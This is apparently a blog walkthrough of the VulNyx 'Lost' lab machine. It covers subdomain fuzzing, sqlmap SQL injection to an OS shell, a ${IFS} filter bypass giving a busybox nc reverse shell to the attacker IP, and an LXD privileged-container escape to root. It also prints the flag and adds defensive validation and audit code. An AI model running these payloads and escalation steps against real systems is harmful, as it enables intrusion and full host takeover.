Lost
Attacker IP: 192.168.108.50
Target IP: 192.168.108.138
Target machine: https://vulnyx.com/
```
Kal ddddx ~ ❯ export ip=192.168.108.138                                        at 13:40:52
Kal ddddx ~ ❯ rustscan -a $ip                                                  at 13:43:22
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.138:22
Open 192.168.108.138:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 13:43 CST
Initiating ARP Ping Scan at 13:43
Scanning 192.168.108.138 [1 port]
Completed ARP Ping Scan at 13:43, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:43
Completed Parallel DNS resolution of 1 host. at 13:43, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:43
Scanning 192.168.108.138 [2 ports]
Discovered open port 22/tcp on 192.168.108.138
Discovered open port 80/tcp on 192.168.108.138
Completed SYN Stealth Scan at 13:43, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.108.138
Host is up, received arp-response (0.00062s latency).
Scanned at 2025-06-10 13:43:27 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:7E:00:92 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```
Ports 22 and 80 are open. Visiting port 80 shows nothing but a single image, and the page source hints that we should enumerate more domain names. First add the domain we already have, lost.nyx, to /etc/hosts, then brute-force hidden subdomains.
```
Kal ddddx ~ ❯ ffuf -u http://192.168.108.138 -H "Host: FUZZ.lost.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 819

        v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.108.138
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.lost.nyx
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 819
________________________________________________

dev                     [Status: 200, Size: 9936, Words: 3426, Lines: 295, Duration: 48ms]
:: Progress: [114441/114441] :: Job [1/1] :: 1005 req/sec :: Duration: [0:02:01] :: Errors: 0 ::
```
Disable the tun interface, add dev.lost.nyx to hosts as well and open it. The passenger list page asks us to enter an ID to view a passenger's details, and the characters page lists four characters: Jack Shephard, John Locke, Kate Austen and Hugo "Hurley" Reyes.

Use sqlmap to check whether the ID parameter is injectable; it is. Try to dump all users. Note that the manual test showed a boolean-based injection, while sqlmap by default tries error-based or union-based techniques first and may not succeed, so specify boolean-based or time-based blind injection explicitly with --technique=B.

The tables can be listed, but when it comes to the final query for the column contents nothing can be dumped.

So instead we use the sqlmap injection to obtain an operating-system shell.
```
Kal ddddx ~ ❯ sqlmap -u http://dev.lost.nyx/passengers.php\?id\=1 --os-shell
Kal ddddx ~ ❯ vi php-reverse-shell.php
Kal ddddx ~ ❯ python -m http.server 80
Kal ddddx ~ ❯ curl http://dev.lost.nyx/php-reverse-shell.php
```
Upload the shell, curl it, and we get an interactive session.

```
(remote) www-data@lost:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@lost:/$ whoami
www-data
(remote) www-data@lost:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
jackshephard:x:1000:1000:jack shephard,,,:/home/jackshephard:/bin/bash
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
johnlocke:x:1001:1001::/home/johnlocke:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
_lxd:x:103:111::/var/lib/lxd/:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
```
Now try to escalate privileges. Checking the network connections shows something listening on port 3000.

```
(remote) www-data@lost:/$ ss -luntp
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      80         127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      4096       127.0.0.1:3000       0.0.0.0:*
tcp   LISTEN 0      128             [::]:22            [::]:*
tcp   LISTEN 0      511                *:80               *:*
```
socat is already on the box, so there is no need to upload one. Forwarding the port reveals a ping utility. Trying to inject a malicious command, it is detected before execution, so we start looking for a bypass.

```
(remote) www-data@lost:/tmp$ which socat
/usr/bin/socat
(remote) www-data@lost:/tmp$ socat TCP-LISTEN:4000,fork TCP4:127.0.0.1:3000 &
(remote) www-data@lost:/tmp$ socat TCP-LISTEN:4000,fork TCP4:127.0.0.1:3000
```
Fuzz it with wfuzz, hiding the two normal responses of sizes 666 and 645 (the ping tool's ordinary output), so only responses that differ from the usual ping reply are shown. In the end it turns out that a command placed directly after | gets past the filter.

```
Kal ddddx ~ ❯ wfuzz -H "Content-Type: application/x-www-form-urlencoded" \
    -d "ip=FUZZ" \
    -w /usr/share/wordlists/wfuzz/Injections/All_attack.txt \
    -u http://dev.lost.nyx:4000/ \
    --hh 666,645
```
Try to send a reverse shell back to the attacker machine.

busybox is available.

But the reverse shells we tried all failed; each one is recognised. Adding a space after 1|id is also flagged as malicious input, so we guess that spaces are filtered. URL encoding does not get around it; since the input ends up in a shell, use ${IFS} in place of the spaces.

```
1|busybox${IFS}nc${IFS}192.168.108.50${IFS}4444${IFS}-e${IFS}sh
```

Once inside, we can read the source of the ping page.
```
(remote) jackshephard@lost:/opt/pinged$ cat pinged.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ping Tool</title>
    <style>
        body {
            background-image: url('numbers.gif');
            background-size: cover;
            background-repeat: no-repeat;
        }
    </style>
</head>
<body>
    <h1>Ping the Lost IP's</h1>
    <form action="" method="POST">
        <label for="ip">Enter the IP address to ping:</label><br>
        <input type="text" id="ip" name="ip"><br>
        <input type="submit" value="Ping">
    </form>
    <?php
    if(isset($_POST['ip'])){
        echo "<hr /><br />";
        // remove common special characters that are used
        $blacklist = array(" ","&",",","@",";","^","~","`","<",">",",","\\","/");
        $input = $_POST['ip'];
        $containsMaliciousInput = false;
        foreach ($blacklist as $char) {
            if (strpos($input, $char) !== false) {
                $containsMaliciousInput = true;
                break;
            }
        }
        // Add blacklisted commands
        $blacklistedCommands = array("ls","cat","less","tail","more","whoami","pwd","busybox","echo","id");
        if (in_array($input, $blacklistedCommands)) {
            $containsMaliciousInput = true;
        }
        if ($containsMaliciousInput) {
            echo "Malicious input/command detected";
        } else {
            $output = shell_exec("ping -c 1 ".$input);
            if(isset($_GET["debug"]) == true){
                echo "<div>ping -c 1 ".$input."</div>";
            }
            echo "<pre>".$output."</pre>";
        }
    }
    ?>
</body>
</html>
```

```php
$blacklist = array(" ","&",",","@",";","^","~","`","<",">",",","\\","/");
$blacklistedCommands = array("ls","cat","less","tail","more","whoami","pwd","busybox","echo","id");
$output = shell_exec("ping -c 1 ".$input);
```
These two blacklists explain the behaviour we ran into earlier. The character list is checked with strpos, so it blocks spaces, & and ; but says nothing about |, $, { or }, which is why the ${IFS} trick works. The command list is checked with in_array, an exact match against the whole input, so it catches "id" on its own but not "1|id"; it handles neither concatenation nor substrings. shell_exec then concatenates the input straight into a command line and executes it, which makes this a high-risk command-injection point.
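As an added illustration (not code from the writeup or from the target), the Python below re-implements the page's two blacklists so you can see which of the inputs discussed above they let through, and sets an allowlist check beside them: accept only a literal IP address and pass it to ping as an argument vector rather than through a shell. The PHP equivalent of the hardened check is filter_var($input, FILTER_VALIDATE_IP) followed by escapeshellarg().

```python
import ipaddress
from typing import List, Optional

# Character and command blacklists copied from pinged.php (duplicate "," dropped).
BLACKLIST_CHARS = [" ", "&", ",", "@", ";", "^", "~", "`", "<", ">", "\\", "/"]
BLACKLIST_CMDS = ["ls", "cat", "less", "tail", "more", "whoami",
                  "pwd", "busybox", "echo", "id"]


def blacklist_allows(user_input: str) -> bool:
    """Mirror of the page's filter: True means pinged.php would run the input."""
    if any(ch in user_input for ch in BLACKLIST_CHARS):   # strpos() on each char
        return False
    if user_input in BLACKLIST_CMDS:                        # in_array(): exact match only
        return False
    return True


def allowlist_validate(user_input: str) -> Optional[str]:
    """Hardened check: the input must parse as one IPv4/IPv6 address, nothing else."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def build_ping_argv(user_input: str) -> Optional[List[str]]:
    """Argument vector for subprocess.run(argv) with no shell; None if rejected.

    Because no shell parses the line, characters such as |, $ and ${IFS} are
    inert even if validation were ever loosened.
    """
    addr = allowlist_validate(user_input)
    if addr is None:
        return None
    return ["ping", "-c", "1", addr]
```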
```
(remote) jackshephard@lost:/opt/pinged$ id
uid=1000(jackshephard) gid=1000(jackshephard) groups=1000(jackshephard),111(lxd)
```

The user belongs to the lxd group, which means an LXD container escape can be used to escalate to root.

By changing yaml_path to pin the Alpine v3.8 release we avoid the validation problem with newer versions, then build the image.
```
git clone https://github.com/saghul/lxd-alpine-builder                         at 14:37:24
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
```
```
lxc image import <file.tar.gz> --alias alpine
```
Import a local tar.gz container image and give it the alias alpine, so containers can be created from it quickly afterwards.

```
lxc image list
```
List the images currently imported on the system, to confirm that alpine is present.

```
lxc init alpine privesc -c security.privileged=true
```
Initialise a container instance named privesc from the alpine image and set it to privileged mode (one of the two key points of the escalation): in privileged mode the container's UIDs/GIDs are no longer mapped, so root inside the container is the real host root and can potentially break out of the isolation.

```
lxc config device add privesc boxbox disk source=/ path=/mnt/root recursive=true
```
Map the host's root directory / to /mnt/root inside the container, so that /mnt/root in the container gives access to the host file system. recursive=true means subdirectories and mount points are all included, and the device name boxbox is arbitrary. ⚠️ This is the other key point: the container can access the host file system directly.

```
lxc start privesc
```
Start the container named privesc.

```
lxc exec privesc sh
```
Run a sh shell inside the container and start working from there.
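From the defender's side, the two settings just described (security.privileged=true plus a disk device whose source is the host /) are exactly what to look for in lxc config show output. The following is an added example, not part of the writeup, that parses such a dump and flags that combination; SAMPLE_CONFIG is constructed to mirror what the commands above would produce for the privesc container.

```python
from typing import Dict, List

# Constructed sample of `lxc config show privesc` after the commands on this page.
SAMPLE_CONFIG = """\
name: privesc
config:
  security.privileged: "true"
devices:
  boxbox:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
"""


def parse_lxc_config(text: str) -> Dict[str, dict]:
    """Minimal parser for the two-level YAML that `lxc config show` prints."""
    result: Dict[str, dict] = {"config": {}, "devices": {}}
    section, device = None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        value = value.strip().strip('"')
        if indent == 0:                       # top-level key: name, config, devices
            section, device = key, None
        elif section == "config" and indent == 2:
            result["config"][key] = value
        elif section == "devices" and indent == 2:   # device name
            device = key
            result["devices"][device] = {}
        elif section == "devices" and indent == 4 and device:
            result["devices"][device][key] = value
    return result


def audit_lxc_config(text: str) -> List[str]:
    """Return findings for a container config; an empty list means nothing flagged."""
    cfg = parse_lxc_config(text)
    privileged = cfg["config"].get("security.privileged") == "true"
    host_root = [n for n, d in cfg["devices"].items()
                 if d.get("type") == "disk" and d.get("source") == "/"]
    findings = []
    if privileged:
        findings.append("container is privileged: root inside == root on host")
    for name in host_root:
        findings.append(f"disk device {name!r} mounts host / at {cfg['devices'][name].get('path')}")
    if privileged and host_root:
        findings.append("privileged + host root mounted: LXD escape pattern")
    return findings
```

Run it over `lxc config show <container>` for every container on a host, and pair it with a check of `getent group lxd`, since membership of that group is what made this path available in the first place.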
Inside the container, /mnt/root shows the host root directory that was mapped in; from there we can go into root and read the flag.

```
/mnt/root
backups  etc             lib         mnt   run   tmp   vmlinuz.old
bin      home            lib64       opt   sbin  usr
boot     initrd.img      lost+found  proc  srv   var
dev      initrd.img.old  media       root  sys   vmlinuz
/mnt/root
backups/  etc/            lib/         mnt/   run/   tmp/   vmlinuz.old
bin/      home/           lib64/       opt/   sbin/  usr/
boot/     initrd.img      lost+found/  proc/  srv/   var/
dev/      initrd.img.old  media/       root/  sys/   vmlinuz
/mnt/root
/mnt/root/root
root.txt
/mnt/root/root
74cc1c60799e0a786ac7094b532f01b1
```
If you like this blog or find it useful, you are welcome to leave a comment. You are also welcome to share it so more people can take part. If any image used in this blog infringes your copyright, please contact the author to have it removed. Thank you!